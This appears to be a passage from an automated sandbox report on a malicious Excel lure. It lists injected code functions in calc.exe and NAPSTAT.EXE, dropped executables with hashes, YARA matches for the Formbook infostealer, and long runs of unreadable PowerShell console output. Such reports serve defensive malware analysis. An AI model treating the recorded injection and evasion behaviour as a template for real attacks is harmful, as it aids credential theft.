          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0041D84E
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0041E066
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00401030
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0041E94D
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0041D1F1
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0041DA23
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0041DB36
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00402D89
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00402D90
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0041BE22
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00409E30
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00402FB0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A0E0C6
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A3D005
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A13040
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A2905A
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A0E2E9
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00AB1238
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A0F3CF
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A363DB
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A12305
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A5A37B
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A17353
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A45485
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A21489
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A2C5F0
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A1351F
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A14680
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A1E6C1
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00AB2622
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A1C7BC
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A9579A
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A457C3
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00AAF8EE
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A3286D
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A1C85C
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A129B2
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00AB098E
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A269FE
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A95955
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00AC3A83
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00ABCBA4
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A9DBDA
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A0FBD7
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A37B00
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00AAFDDD
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A40D3B
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A1CD5B
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A42E2F
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A2EE4C
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A20F3F
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A3DF7C
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00199862
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00191072
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00191069
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00198132
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0019AA32
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0019DA6F
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00195B1F
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_0019DB0E
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00195B22
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00192CF2
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00192CEC
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00259862
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00251069
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00251072
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00252CEC
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00252CF2
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00258132
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_02161238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020BE2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020C2305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020C7353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_0210A37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020BF3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020E63DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020ED005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020C3040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020D905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020BE0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_02162622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020C4680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020CE6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_0214579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020CC7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020F57C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020D1489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020F5485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020C351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020DC5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_02173A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020E7B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_0216CBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_0214DBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020BFBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020CC85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020E286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_0215F8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_02145955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_0216098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020C29B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020D69FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020F2E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020DEE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020D0F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020EDF7C
          Source: PO20210722.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
          Source: Joe Sandbox View | Dropped File: C:\Users\Public\vbc.exe CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 020BDF5C appears 98 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 020BE2A8 appears 33 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 0212F970 appears 71 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 02103F92 appears 83 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 0210373B appears 213 times
          Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 00A0DF5C appears 107 times
          Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 00A7F970 appears 81 times
          Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 00A53F92 appears 108 times
          Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 00A5373B appears 238 times
          Source: C:\Windows\SysWOW64\calc.exe | Code function: String function: 00A0E2A8 appears 38 times
          Source: vbc.exe.4.dr | Static PE information: Number of sections : 11 > 10
          Source: obi[1].exe.4.dr | Static PE information: Number of sections : 11 > 10
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@12/15@4/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$PO20210722.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE81D.tmp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................#.................(...............(.......#.....`I%........v.....................K,.............j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....#...............4..j......................_.............}..v....H.......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v..../.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.7.6.............}..v....X.......0.................P.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v..../...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....;..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....;...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....G..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....G...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....S..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....S...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v...._..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v...._...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....k..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....k...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....w..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....w...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................E.M.....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....X$......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....%................_.............}..v.....%......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....X,......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....-................_.............}..v.....-......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....X4......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....5................_.............}..v.....5......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....X<......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....=................_.............}..v.....=......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....XD......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....E................_.............}..v.....E......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....XL......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....M................_.............}..v.....M......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....XT......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....U................_.............}..v.....U......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....X\......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....]................_.............}..v.....]......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....Xd......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....e................_.............}..v.....e......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....Xl......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....m................_.............}..v.....m......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....Xt......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v....................4..j.....u................_.............}..v.....u......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.v.......................j......P..............._.............}..v....X|......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....}................_.............}..v.....}......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X.......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j......................_.............}..v............0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X$......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....%................_.............}..v.....%......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......P..............._.............}..v....X,......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................4..j.....-................_.............}..v.....-......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......P..............._.............}..v....X4......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............4..j.....5................_.............}..v.....5......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......P..............._.............}..v....X<......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............4..j.....=................_.............}..v.....=......0...............H.P.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......P..............._.............}..v....XD......0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............4..j.....E................_.............}..v.....E......0...............H.P.............................
